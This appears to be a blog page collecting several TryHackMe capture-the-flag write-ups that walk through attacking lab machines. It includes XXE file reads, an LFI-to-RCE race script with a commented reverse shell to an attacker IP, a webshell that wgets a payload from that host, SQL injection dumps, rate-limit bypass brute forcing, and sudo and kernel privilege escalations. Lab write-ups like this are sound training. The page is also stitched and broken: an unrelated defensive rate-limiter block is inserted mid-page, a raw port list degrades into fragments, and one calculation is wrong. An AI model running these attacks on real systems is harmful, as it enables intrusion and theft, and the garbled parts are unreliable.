Solar, exploiting log4j (Try Hack Me Writeup)

https://tryhackme.com/room/solar

On 2021/12/9 CVE-2021-44228 was published. It affects log4j, carries the maximum severity rating of 10, and is also known as Log4Shell. A newer 2.16.0 release is already out, but Log4j2 has kept turning up again.

Recon

Port scanning shows 3 open ports: 22, 111 and 8983.

    rustscan -a 10.10.18.186 -r 1-65535

nmap gives a more detailed scan:

    nmap -sV -Pn -A -p22,111,8983 10.10.18.186

This shows that 8983 is an Apache Solr server.

Discovery

The version shown on the front page tells us it is Solr 8.11.0. The -Dsolr.log.dir value shows the log path is /var/solr/logs. Download the solrlogs.zip file the lab provides; it is a set of sample log files. Inside there is a file called solr.log that records logs related to the requested web paths ...

2021-12-19 · 2 min · steven

Battery (Try Hack Me Writeup)

URL : https://tryhackme.com/room/battery
IP : 10.10.207.162

Recon

Port scan:

    rustscan -a 10.10.207.162 -r 1-65535

Ports 22 and 80 are open.

    nmap -A -p22,80 10.10.207.162

Web

Look at the front page and scan for paths: /forms/admin.php. Found /forms; if the header is removed it no longer redirects automatically. The data it sends is XML, so XXE might be possible, but without a login every attempt fails. (The XML tag literals in the snippet below did not survive the page's rendering.)

    function XMLFunction(){
        var xml = '' +
            '' +
            '' +
            '' + $('#name').val() + '' +
            '' + $('#search').val() + '' +
            '';
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
            if(xmlhttp.readyState == 4){
                console.log(xmlhttp.readyState);
                console.log(xmlhttp.responseText);
                document.getElementById('errorMessage').innerHTML = xmlhttp.responseText;
            }
        }
        xmlhttp.open("POST","forms.php",true);
        xmlhttp.send(xml);
    };

Register an account on register.php: meow ABC meow. Registration succeeds, so try logging in. The features on the interface turn out not to work. Register another one: meow1 DEF meow1. Scan directories: there is a /report. Download it; it is an ELF.

Reverse

Menu, user, string comparison, update. The admin@bank.a in here looks pretty suspicious.

Web

Try registering admin@bank.a and get mocked QQ, but that means it really is related! Use Burp to append %00 and truncate: registration succeeds. Whatever is entered in the backend throws errors. Try the XXE again (again with the tag literals missing):

    function XMLFunction(){
        var xml = '' +
            '\n' +
            ' ]>\n' +
            '' +
            '' + "0" + '' +
            '' + "&b;" + '' +
            '';
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
            if(xmlhttp.readyState == 4){
                console.log(xmlhttp.readyState);
                console.log(xmlhttp.responseText);
            }
        }
        xmlhttp.open("POST","forms.php",true);
        xmlhttp.send(xml);
    };
    XMLFunction();

Files can be read:

    cyber:x:1000:1000:cyber,,,:/home/cyber:/bin/bash
    mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
    yash:x:1002:1002:,,,:/home/yash:/bin/bash

The interesting users are cyber and yash. Read the source with php://filter/convert.base64-encode/resource=/var/www/html/acc.php and find the password in a comment: //MY CREDS :- cyber:super#secure&password!

SSH

Connect successfully and grab the Base Flag.

Privilege escalation

Opening move: sudo -l. We can run a run.py as root, but we have no permission to read it QQ. Look at the source: admin.php contains the mysql credentials. Dump Mysql:

    mysqldump -u root -h 127.0.0.1 -p details > a.sql

A password shows up, I_know_my_password, but it doesn't seem to lead anywhere QQ. Run Linpeas: the Linux kernel looks fairly old, so the exploit at https://www.exploit-db.com/exploits/37292 can be used. Download it, compile and run it, and that gets root. Flag2. Root Flag.

Another privilege-escalation route: we could sudo run.py but could not read it; since it lives in my home directory, though, I can rename files and create new ones. So create my own run.py:

    import os
    os.system("/bin/bash")

Then sudo it, which also escalates fine.

Learned: %00 truncation; for XXE, remember to add the ;

2021-09-02 · 2 min · steven

Windows Fundamentals 1 (Try Hack Me Writeup)

URL : https://tryhackme.com/room/windowsfundamentals1xbx

Task 1 Introduction to Windows

You can get into Windows with RDP or similar. Default account: administrator; default password: letmein123! I just used the web RDP interface THM provides.

Task 2 Windows Editions

Differences between the Home edition and Pro: Pro can use BitLocker and can use WIP. https://www.microsoft.com/en-us/windows/compare-windows-10-home-vs-pro
What encryption can you enable on Pro that you can't enable in Home? A: BitLocker

Task 3 The Desktop (GUI)

Which selection will hide/disable the Search box? Hidden
Which selection will hide/disable the Task View button? Show Task View button
Besides Clock, Volume, and Network, what other icon is visible in the Notification Area? action center

Task 4 The File System

File systems:
FAT16 / FAT32: File Allocation Table, still seen on USB devices and the like
HPFS: High Performance File System
NTFS: New Technology File System

NTFS advantages: a journaling file system that can automatically repair itself from the log; single files >= 4G; permissions can be set on folders and files; folder and file compression; encryption (Encryption File System, EFS)

NTFS permissions:
Read: on a folder, view and list the files and subfolders in it; on a file, view or access its contents
Write: on a folder, add files or subfolders to it; on a file, write to it
Read & Execute: on a folder, view and list its files and subfolders and execute files, inherited by files and folders; on a file, view and access its contents and execute the file
List folder contents: on a folder, view and list its files and subfolders and execute files, inherited by folders only
Modify: on a folder, read and write files and subfolders, and delete the folder; on a file, read and write the file, and delete the file
Full Control: on a folder, read, write, change and delete files and subfolders; on a file, read, write, change and delete the file

Alternate Data Streams (ADS)
An NTFS attribute. Every file has at least one data stream ($DATA); ADS lets a file contain multiple data streams. Windows Explorer does not show ADS to the user; a specific third-party tool or PowerShell is needed, which is why malware sometimes uses ADS to hide data. Further reading: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
Example: create a thing with an ADS. dir doesn't show it, and neither does type. In PowerShell you can use

    GET-Item -path C:\Users\Administrator\Desktop\example -stream *

In CMD you need the Sysinternals Streams tool: https://docs.microsoft.com/zh-tw/sysinternals/downloads/streams
What is the meaning of NTFS? New Technology File System

Task 5 The Windows\System32 Folders

%windir% is most commonly located at C:\Windows. It holds the operating system, but it does not have to be on C:, and a few lunatics set it somewhere else. That is why we use the environment variable, or rather the system environment variable, to reach it correctly.
System32: this folder contains many files critical to the operating system; be very careful when changing or deleting them, as that can easily break the system.
What is the system variable for the Windows folder? %windir%

Task 6 User Accounts, Profiles, and Permissions

Two types of account.
Administrator: add and delete users; modify groups; change operating system settings.
Standard User: modify the properties of folders and files belonging to that user; cannot make system-level changes such as installing software.
User home directory: C:\Users\{Username}, containing Desktop, Documents, Downloads, Music and Pictures by default.
Local User and Group Management: lusrmgr.msc shows information about the various users and groups.
What is the name of the other user account? tryhackmebilly
What groups is this user a member of? Remote Desktop Users,Users
What built-in account is for guest access to the computer? Guest
What is the account status? Account is disabled

Task 7 User Account Control

UAC, User Account Control, in use since Vista. You can see that an installer may lack the permissions of the user. Log in as an ordinary user, tryhackmebilly / window$Fun1! at 10.10.229.121, and a shield icon appears; running the installer asks for the Administrator's password.
What does UAC mean? User Account Control

Task 8 Settings and the Control Panel

The Settings page appeared from Win8 on; the old Control Panel remains.
In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view? Pick Small icons at the top right; the last option is Windows Defender Firewall

Task 9 Task Manager

What is the keyboard shortcut to open Task Manager? ctrl+shift+esc. Wow, I honestly didn't know this existed.

Task 10 Conclusion

Meow meow

2021-08-24 · 2 min · steven

VulnNet (Try Hack Me Writeup)

URL : https://tryhackme.com/room/vulnnet1
IP : 10.10.86.144

Task description: You will have to add a machine IP with domain vulnnet.thm to your /etc/hosts

Recon

Port scan:

    rustscan -a 10.10.86.144 -r 1-65535
    nmap -A -p22,80 10.10.86.144

Scan directories:

    python3 dirsearch.py -u http://10.10.86.144/

Found a login page. Poked at the common SQLi payloads; none worked. Look at the page's links, prettified with a js formatter: broadcast.vulnnet.thm, added to /etc/hosts. The earlier stage could also be done with LinkFinder:

    python3 linkfinder.py -i http://vulnnet.thm/
    python3 linkfinder.py -i http://vulnnet.thm/js/index__d8338055.js

The front page accepts a ?referer parameter. Visit broadcast.vulnnet.thm: it requires a login. Look at the front page's referer parameter: LFI is possible. Use the session upload progress trick (the PHP tag literals in the snippet did not survive the page's rendering):

    import grequests

    sess_name = 'meowmeow'
    sess_path = f'/var/lib/php/sessions/sess_{sess_name}'
    base_url = 'http://vulnnet.thm/index.php'
    param = "referer"
    #code = "file_put_contents('/tmp/shell.php','& /dev/tcp/10.13.21.55/7877 0>&1'");'''
    while True:
        req = [grequests.post(base_url, files={'f': "A"*0xffff}, data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:"}, cookies={'PHPSESSID': sess_name}),
               grequests.get(f"{base_url}?{param}={sess_path}")]
        result = grequests.map(req)
        if "pwned" in result[1].text:
            print(result[1].text)
            break

And that gives RCE (doesn't feel like the intended solution... heh).

Privilege escalation

    python3 -c 'import pty; pty.spawn("/bin/bash")'

Run linpeas: found backup. Looking at the backup files, there is an ssh-backup; pull it out and decompress it: it is an id_rsa. Check the home directory for the username: server-management. Prepare to ssh in: the id_rsa needs a passphrase QQ. Crack it with John:

    python3 ../../ssh2john.py id_rsa > id_rsa_john

The passphrase is oneTWO3gOyac. SSH in and take the user flag. Running linpeas also turned up the password hash in .htpasswd, presumably used for broadcast.vulnnet.thm. Crack it with John: the password is 9972761drmfsls. I guess the intended solution was to LFI this file. Visit broadcast.vulnnet.thm with the account developers and password 9972761drmfsls. This is presumably some CMS with an RCE hole, and the intended route gets RCE from there. Whatever.

Second privilege escalation

Recall the earlier backup used tar *, so escalation is quick. Catch a shell and take the Root Flag.

2021-08-23 · 1 min · steven

Sustah (Try Hack Me Writeup)

URL : https://tryhackme.com/room/sustah
IP : 10.10.252.122

Recon

Port scan:

    rustscan -a 10.10.252.122 -r 1-65535
    nmap -A -p22,80,8085 10.10.252.122

gunicorn 20.0.4. Look at the front page: nothing at all. Scan directories: nothing either. Look at port 8085: it looks like a lucky wheel. Scan directories: there is a ping that only replies pong.

Brute-forcing the number

Below it is a number-guessing game; it says I have a 0.004% chance of winning. First test whether it can be brute-forced at all:

    from bs4 import BeautifulSoup
    import requests

    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Origin': 'http://10.10.252.122:8085',
        'Connection': 'keep-alive',
        'Referer': 'http://10.10.252.122:8085/home',
        'Upgrade-Insecure-Requests': '1',
    }
    data = {
        'number': '123'
    }
    for i in range(100):
        response = requests.post('http://10.10.252.122:8085/home', headers=headers, data=data)
        soup = BeautifulSoup(response.text,'html.parser')
        try:
            print(soup.find('h3').text)
        except:
            print(soup)

After too many requests it returns {"error":"rate limit execeeded"}. After many attempts I found that sending 'X-Remote-Addr' : '127.0.0.1' makes the error go away. Do the maths: 1/(0.004%) = 25000, so the number presumably lies in that range. Write a script to brute-force it:

    from bs4 import BeautifulSoup
    import requests
    from multiprocessing import Process, Pool

    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Origin': 'http://10.10.252.122:8085',
        'Connection': 'keep-alive',
        'Referer': 'http://10.10.252.122:8085/home',
        'Upgrade-Insecure-Requests': '1',
        'X-Remote-Addr' : '127.0.0.1'
    }
    l = [i for i in range(25000)]

    def meow(num):
        data = {
            'number': num
        }
        response = requests.post('http://10.10.252.122:8085/home', headers=headers, data=data)
        soup = BeautifulSoup(response.text,'html.parser')
        try:
            s = soup.find('h3').text
            if 'Oh no!' not in s:
                print(num,s)
        except:
            print(soup , response.status_code)

    p = Pool(200)
    p.map(meow,l)

It pops out within seconds: 10921. The response gives /YouGotTh3P@th/; add that to the path on port 80 and a CMS appears.

CMS

It is Mara CMS, which can be logged into with the default admin / changeme. After logging in it also wants me to change the password quickly. Look up related exploits: https://www.exploit-db.com/exploits/48780. It looks like a webshell can be uploaded directly, so upload one. It really works:

    http://10.10.252.122/YouGotTh3P@th/img/webshell.php?A=wget 10.13.21.55:8000/s -O /tmp/s

Pop a reverse shell.

Privilege escalation

    python3 -c "import pty;pty.spawn('/bin/bash')"

Try LSE: bash lse.sh -l1; nothing stands out QQ. The find command turns out to be blocked QWQ. The hint says to look for backup files. Two approaches seen online:

    tar cf - $PWD 2>/dev/null | tar tvf - | grep backup    (slow)
    du -a 2>/dev/null | grep backup                          (fast)

/usr/backups turns up quickly. It contains a hidden file .bak.passwd; unpack it to get credentials: kiran / trythispasswordforuserkiran. su over and take the User Flag.

Second privilege escalation

Opening move: sudo -l. Run linpeas: there is a cool doas command that needs neither suid nor sudo. Look up rsync to shell on GTFOBins: https://gtfobins.github.io/gtfobins/rsync/#suid

    doas rsync -e 'sh -p -c "sh 0&2"' 127.0.0.1:/dev/null

Escalation succeeds; take the Root Flag.
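The rate-limit bypass above boils down to the service keying its limiter on a client-supplied X-Remote-Addr header. The following Python, added here and not code from the room or this post, models that weak resolver beside a hardened one that only accepts a forwarded address when the TCP peer is a configured trusted proxy; the limit numbers, proxy address, allowlist and replayed request samples are all constructed for the demonstration.

```python
import time
from collections import defaultdict, deque

LIMIT = 5                       # requests allowed per client per window (constructed)
WINDOW = 60.0                   # window length in seconds (constructed)
ALLOWLIST = {"127.0.0.1"}       # addresses exempt from limiting, e.g. local health checks (constructed)
TRUSTED_PROXIES = {"10.0.0.2"}  # assumed: the only peer allowed to assert a client address


class RateLimiter:
    """Sliding-window limiter keyed by whatever string the caller resolves as the client."""

    def __init__(self, limit=LIMIT, window=WINDOW):
        self.limit = limit
        self.window = window
        self.hits = defaultdict(deque)  # client key -> timestamps of recent requests

    def allow(self, client_key, now=None):
        if client_key in ALLOWLIST:
            return True                          # exempt, never counted
        now = time.monotonic() if now is None else now
        q = self.hits[client_key]
        while q and now - q[0] > self.window:    # drop hits older than the window
            q.popleft()
        if len(q) >= self.limit:
            return False                         # caller answers with a rate-limit error
        q.append(now)
        return True


def weak_client_key(peer_addr, headers):
    """Vulnerable pattern: a header any client can set overrides the TCP peer address."""
    return headers.get("X-Remote-Addr", peer_addr)


def hardened_client_key(peer_addr, headers):
    """Only a configured reverse proxy may assert the client address; all other peers are keyed by the socket address."""
    if peer_addr in TRUSTED_PROXIES and headers.get("X-Remote-Addr"):
        return headers["X-Remote-Addr"].strip()
    return peer_addr


def count_allowed(key_func, requests):
    """Replay (peer_addr, headers) pairs one second apart; return how many pass the limiter."""
    limiter = RateLimiter()
    return sum(
        1 for i, (peer, headers) in enumerate(requests)
        if limiter.allow(key_func(peer, headers), now=float(i))
    )


# Constructed traffic: 10 plain guesses from one host, then 10 more carrying the spoofed header.
ATTACK = [("203.0.113.7", {})] * 10 + [("203.0.113.7", {"X-Remote-Addr": "127.0.0.1"})] * 10
# Constructed legitimate traffic: the trusted proxy forwarding two different clients, 6 requests each.
VIA_PROXY = ([("10.0.0.2", {"X-Remote-Addr": "198.51.100.1"})] * 6
             + [("10.0.0.2", {"X-Remote-Addr": "198.51.100.2"})] * 6)

if __name__ == "__main__":
    print("weak limiter, spoofing attacker:", count_allowed(weak_client_key, ATTACK))      # 15
    print("hardened limiter, same attacker:", count_allowed(hardened_client_key, ATTACK))  # 5
    print("hardened limiter, real proxy:", count_allowed(hardened_client_key, VIA_PROXY))  # 10
```

With the weak resolver the spoofed half of the traffic lands on the exempt key and is never counted; the hardened resolver keeps every request from the attacking host on its real address while still letting the trusted proxy distinguish its clients.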

2021-08-23 · 2 min · steven

Madeye Castle (Try Hack Me Writeup)

URL : https://tryhackme.com/room/madeyescastle
IP : 10.10.150.136

Recon

Port scan:

    rustscan -a 10.10.150.136 -r 1-65535

    Open 10.10.150.136:22
    Open 10.10.150.136:80
    Open 10.10.150.136:139
    Open 10.10.150.136:445

    nmap -A -p22,80,139,445 10.10.150.136

Scan paths:

    python3 dirsearch.py -u http://10.10.150.136

backup/. Look at the front page: compared to the Apache default page there seems to be an extra logo, but it is broken. Try smb with an anonymous login:

    smbclient -N '//10.10.150.136/sambashare'

Download the files. One looks like some kind of wordlist; the other seems to hint that Hagrid may be using a password from rockyou. Try cracking with Hydra:

    hydra -L user.txt -P spellnames.txt hogwartz-castle.thm http-post-form "/login:user=^USER^&password=^PASS^:Incorrect Username or Password"

It feels slow and inefficient, so leave it running on the side. Look at the front page's comments: it looks like we can edit /etc/hosts and reach the front page via a domain name, which gives a page where a username and password can be entered. Scan paths: nothing much.

SQLi

Try SQLi; random input throws a 500 error. First copy the request as curl:

    curl 'http://hogwartz-castle.thm/login' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://hogwartz-castle.thm' -H 'Connection: keep-alive' -H 'Referer: http://hogwartz-castle.thm/' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'user=aa&password=bb'

Union works:

    'union select 1,2,3,4 --

Tried things like version and none of them worked, before realising it is SQLite:

    'union select sqlite_version(),2,3,4 --

Dump the SQLite tables:

    'union select name,2,3,4 from sqlite_master WHERE type='table' --

There is only one table, users. Dump the columns:

    'union select sql,2,3,4 from sqlite_master WHERE type='table' --

name password admin notes. Select the users:

    'union select group_concat(name),2,3,4 from users --

Select admin. Dump the username and password pairs:

    import requests

    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Origin': 'http://hogwartz-castle.thm',
        'Connection': 'keep-alive',
        'Referer': 'http://hogwartz-castle.thm/login',
        'Upgrade-Insecure-Requests': '1',
    }
    # 'union select 1,2,3,4 --
    for i in range(1,40):
        data = {
            'user': f"'union select name || ':' || password,2,3,4 from users limit {i},1 --",
            'password': '123'
        }
        response = requests.post('http://hogwartz-castle.thm/login', headers=headers, data=data)
        name = response.text[27:-19]
        print(name)

That gives all the hashes. Analysing the hash format: SHA 512. Use hashcat:

    hashcat -m 1700 hashes.txt spellnames.txt
    hashcat -m 1700 hashes.txt /opt/rockyou.txt

Basically nothing cracks. Look at the notes:

    'union select group_concat(notes),2,3,4 from users --

The passwords use best64. Look up how hashcat's best64 rule works: https://github.com/hashcat/hashcat/blob/master/rules/best64.rule

    hashcat -m 1700 hashes.txt /opt/rockyou.txt -r best64.rule

That cracks a password: b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885:wingardiumleviosa123. Go back to the SQLi to find the user:

    'user': "'union select name,2,3,4 from users where password like 'b326e7a6%' --

Harry Turner. Look at his notes:

    "'union select notes,2,3,4 from users where password like 'b326e7a6%' --

Use the first name.

SSH

    ssh harry@hogwartz-castle.thm

Password: wingardiumleviosa123. Login succeeds.

Privilege escalation

sudo -l shows a program called pico that can be run as hermonine. Run it: it turns out to be nano. Look for a way to exploit it: https://gtfobins.github.io/gtfobins/nano/#sudo

    sudo -u hermonine /usr/bin/pico
    ^R^X
    reset; sh 1>&0 2>&0

Lateral movement succeeds and we get the User Flag.

Second privilege escalation

The user's home directory has a .python_history, which looks like leftovers from using pwntools.

    python -c 'import pty; pty.spawn("/bin/bash")'

for a more interactive shell. Run linpeas: it finds a curious suid file, /srv/time-turner/swagger. Run it directly: it looks like a number-guessing game. Throw it into ida: it appears to use the timestamp as the random seed. We can compile our own program and feed it the current time:

    date +%s ; /srv/time-turner/swagger

gets the current timestamp and runs the program. Compile our own C program, give it the specified timestamp and fill the answer in! Success, and we find it calls uname without an absolute path, so PATH can be overridden:

    /bin/date +%s ;PATH=/home/hermonine/fakepath:$PATH /srv/time-turner/swagger

That gets root. Root Flag: RME{M@rK-3veRy-hOur-0135d3f8ab9fd5bf}

2021-08-23 · 2 min · steven

Looking Glass (Try Hack Me Writeup)

URL : https://tryhackme.com/room/lookingglass
IP : 10.10.150.136

Recon

Port scan:

    rustscan -a 10.10.150.136 -r 1-65535

What the heck ?_? First look at the more unusual one, port 22: nothing special there either. Save the scan to a file:

    rustscan -a 10.10.150.136 -r 1-65535 --accessible | tee rustscan.txt

Look with curl. Then look with nmap -sV against the full list of ports rustscan found on 10.10.150.136.
2651,12656,12655,12654,12652,12658,12662,12660,12659,12657,12661,12665,12663,12664,12666,12669,12667,12668,12670,12671,12672,12673,12674,12675,12676,12679,12677,12685,12678,12686,12688,12687,12697,12698,12699,12701,12700,12713,12703,12712,12714,12711,12702,12720,12716,12717,12721,12718,12719,12715,12722,12725,12723,12724,12726,12728,12730,12727,12735,12731,12729,12734,12737,12732,12733,12736,12739,12745,12738,12740,12748,12746,12761,12749,12762,12750,12747,12770,12765,12772,12768,12766,12767,12769,12763,12778,12775,12780,12782,12777,12776,12771,12764,12781,12784,12783,12779,12787,12786,12788,12790,12789,12791,12794,12797,12798,12800,12799,12796,12802,12795,12793,12792,12803,12801,12804,12808,12806,12815,12816,12807,12805,12819,12817,12818,12820,12823,12824,12826,12822,12825,12821,12827,12828,12829,12832,12831,12830,12834,12835,12833,12836,12837,12838,12839,12841,12842,12840,12843,12846,12844,12850,12848,12849,12845,12851,12847,12854,12852,12855,12853,12856,12858,12857,12860,12861,12859,12862,12863,12864,12865,12867,12868,12866,12869,12872,12875,12873,12870,12874,12876,12878,12871,12879,12882,12880,12883,12881,12877,12887,12885,12886,12884,12889,12890,12896,12893,12892,12891,12888,12895,12894,12897,12898,12900,12901,12899,12904,12903,12902,12907,12905,12906,12908,12910,12909,12911,12913,12912,12915,12916,12914,12917,12918,12919,12921,12922,12920,12924,12925,12923,12926,12927,12928,12929,12932,12930,12933,12931,12934,12942,12936,12935,12939,12937,12943,12944,12940,12941,12945,12938,12946,12947,12949,12951,12950,12948,12952,12953,12954,12958,12956,12962,12955,12959,12960,12961,12957,12970,12972,12966,12965,12969,12968,12967,12964,12973,12974,12976,12978,12971,12985,12977,12979,12963,12981,12987,12986,12984,12982,12993,12990,12988,12975,12992,12980,12989,12983,12991,12999,12995,12996,13000,13002,13001,12994,12997,12998,13003,13004,13007,13015,13012,13011,13008,13017,13016,13005,13014,13009,13010,13018,13006,13013,13031,13033,13030,13149,13029,13035,13034,13032,13037,130
36,13152,13150,13151,13235,13153,13236,13237,13240,13241,13238,13242,13245,13239,13247,13243,13244,13246,13248,13249,13255,13258,13257,13260,13259,13262,13256,13270,13264,13263,13269,13271,13272,13275,13276,13277,13278,13279,13280,13282,13284,13286,13283,13285,13281,13287,13288,13290,13294,13293,13289,13291,13292,13296,13297,13295,13299,13305,13302,13300,13298,13301,13306,13303,13304,12435,12430,12428,12433,12432,12431,12434,12427,12429,13308,13307,13309,13311,13312,13310,13314,13317,13315,13316,13313,13318,13319,13323,13321,13320,13324,13325,13326,13322,13327,13328,13329,13330,13331,13333,13332,13334,12470,12472,12469,12466,12467,12471,12468,12464,12465,12461,12460,13336,13335,13339,13337,13338,13342,13341,13344,13343,13340,13345,13346,13347,13348,13349,13350,12490,12489,12488,12482,12481,12479,12480,13351,13353,13352,13354,13356,13355,13357,13358,13359,13367,13364,13361,13360,13363,13362,13365,13366,13369,13373,13370,13371,13368,13379,13372,13378,13374,13376,13375,13381,13382,13380,13377,13383,13384,13385,13390,13386,13388,13387,13389,13391,13392,13399,13393,13395,13400,13397,13404,13396,13398,13402,13403,13415,13408,13407,13412,13401,13394,13405,13406,13416,13409,13417,13414,13410,13411,13419,13418,13413,13420,13424,13421,13425,13423,13422,13426,13427,13428,13430,13429,13431,13432,13434,13433,13437,13436,13440,13439,13435,13438,13444,13443,13449,13448,13447,13442,13446,13454,13441,13451,13450,13457,13456,13445,13455,13465,13452,13453,13458,13462,13459,13461,13469,13467,13466,13470,13472,13460,13468,13464,13463,13471,13474,13476,13473,13479,13475,13477,13478,13481,13480,13482,12624,13496,12620,12616,12623,12622,13497,12625,12617,12621,12619,12618,13500,13499,13502,13501,13498,13503,13507,13505,13504,13509,13506,13511,13508,13512,13514,13510,13515,13513,12642,12645,12640,12637,12644,12643,12639,12638,12641,13517,13521,13519,13522,13516,13518,13520,13523,13524,13525,13526,13528,13530,13531,13527,13529,13532,13533,13534,13535,13536,13537,13539,13538,13541,13543,13540
,13542,13544,13545,13546,13547,13548,13549,13550,13551,13552,13554,13553,12710,12707,12709,12708,13555,12705,13556,12706,12694,12704,12683,12693,12690,12680,12695,12684,12692,12681,12689,12696,12682,13557,12691,13561,13560,13562,13559,13558,13570,13568,13565,13571,13564,13567,13563,13566,13575,13574,13573,13569,13572,13576,13578,13577,13579,12741,12759,12751,12785,12752,13580,12743,12744,12756,12754,12774,12755,12760,12753,12757,12758,12773,12742,13581,13582,13583,13584,13585,13586,13587,13589,13588,12812,12814,12813,12811,12810,12809,13590,13593,13592,13591,13594,13598,13595,13596,13597,13599,13601,13600,13602,13603,13605,13606,13604,13608,13607,13609,13610,13611,13612,13614,13615,13613,13616,13617,13619,13618,13620,13621,13625,13622,13624,13623,13627,13626,13628,13629,13630,13634,13635,13632,13633,13636,13631,13637,13638,13641,13640,13642,13639,13646,13645,13647,13643,13644,13649,13648,13652,13650,13655,13654,13651,13653,13656,13657,13658,13660,13659,13661,13663,13662,13664,13665,13667,13666,13668,13671,13670,13672,13669,13675,13674,13677,13673,13676,13681,13686,13679,13685,13680,13682,13687,13678,13683,13684,13688,13691,13693,13695,13689,13694,13690,13692,13697,13696,13698,13699,13701,13700,13702,13703,13704,13708,13706,13707,13709,13710,13705,13713,13711,13712,13722,13716,13714,13717,13725,13723,13720,13715,13727,13721,13724,13718,13726,13729,13728,13731,13719,13730,13732,13733,13734,13745,13738,13735,13740,13743,13741,13746,13744,13737,13739,13742,13736,13747,13748,13750,13754,13048,13752,13753,13749,13756,13043,13755,13751,13044,13047,13027,13757,13021,13019,13045,13038,13046,13028,13042,13026,13020,13039,13025,13041,13024,13022,13040,13023,13758,13759,13762,13760,13761,13766,13765,13763,13764,13767,13768,13772,13061,13059,13062,13060,13773,13774,13779,13780,13791,13792,13794,13793,13795,13800,13796,13799,13797,13801,13798,13802,13074,13808,13840,13809,13807,13075,13806,13823,13824,13839,13841,13842,13104,13106,13103,13105,13101,13102,13100,13099,13088,13098,1
3089,13090,13087,13844,13854,13853,13856,13851,13096,13094,13097,13095,13852,13850,13855,13857,13858,13863,13849,13865,13864,13866,13867,13868,13872,13871,13869,13870,13873,13874,13127,13134,13129,13132,13131,13118,13117,13122,13115,13135,13116,13133,13128,13111,13124,13123,13107,13121,13126,13130,13109,13119,13113,13120,13112,13114,13108,13110,13125,13144,13148,13146,13138,13142,13143,13145,13147,13137,13139,13136,13140,13141,13163,13875,13164,13162,13174,13878,13165,13170,13158,13167,13169,13173,13172,13175,13154,13166,13155,13161,13160,13157,13171,13168,13156,13159,13880,13879,13882,13883,13881,13885,13884,13887,13886,13892,13888,13890,13889,13891,13227,13232,13893,13234,13894,13233,13220,13228,13221,13224,13230,13231,13213,13212,13229,13223,13222,13214,13199,13204,13218,13215,13216,13225,13207,13217,13226,13208,13219,13205,13210,13206,13209,13193,13201,13200,13202,13198,13195,13211,13203,13185,13194,13189,13187,13184,13188,13197,13191,13192,13186,13196,13183,13190,13895,13179,13178,13181,13898,13896,13177,13180,13176,13182,13897,13899,13900,13906,13902,13901,13905,13904,13253,13251,13254,13907,13903,13252,13250,13908,13909,13910,13912,13911,13913,13914,13261,13915,13267,13274,13265,13916,13268,13273,13266,13917,13918,13919,13920,13921,13924,13925,13926,13923,13922,13928,13930,13927,13931,13932,13933,13929,13934,13935,13936,13938,13939,13941,13937,13942,13943,13940,13944,13945,13946,13947,13948,13951,13949,13950,13952,13953,13954,13955,13956,13957,13958,13959,13962,13960,13961,13963,13966,13968,13964,13965,13967,13972,13969,13971,13973,13979,13970,13977,13975,13981,13974,13978,13982,13980,13983,13984,13987,13986,13988,13976,13985,13989,13990,13993,13991,13992,13994,13997,13998,13995,13996,13999,13487,13489,13490,13486,13484,13488,13491,13485,13483,13494,13495,13492,13493,13778,13775,13770,13769,13777,13787,13789,13771,13783,13788,13784,13776,13790,13781,13782,13786,13785,13834,13833,13837,13825,13838,13835,13822,13836,13832,13820,13817,13829,13827,13828,13814,138
10.10.150.136: the nmap results all look the same. Ports 9100 ~ 9107 seem a bit different, but connecting to them shows the same thing. Connecting directly with ssh, it told me "Lower"; entering a larger port number, it told me "Higher". We can work out the minimum and maximum port: 13999 - 9000 = 4999. Going through binary search, the worst case is log2(13999 - 9000) = 1504. I found that its High/Low hints are reversed.

import subprocess

ip = "10.10.150.136"
# candidate ports collected earlier, one per line (skip blank lines)
ports = open("ports.txt").read().split("\n")
ports = [int(i) for i in ports if i.strip()]
ports.sort()
# port = ports[-1]
l = ports[0]
r = ports[-1]
while True:
    port = int((l + r) / 2)
    print(f"L={l} , R={r}")
    process = subprocess.Popen(['ssh', '-o', 'StrictHostKeyChecking=no', str(ip), '-p', str(port)],
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = process.communicate()
    print(port, out)
    if out == b'Lower\r\n':
        # r = port
        l = port  # the service's hints are reversed, so "Lower" means move up
    elif out == b'Higher\r\n':
        # l = port
        r = port  # and "Higher" means move down
    else:
        print("!!!!!")  # neither hint: this is the real service
        break

The result that came out is 9934. A pile of gibberish appeared on it:
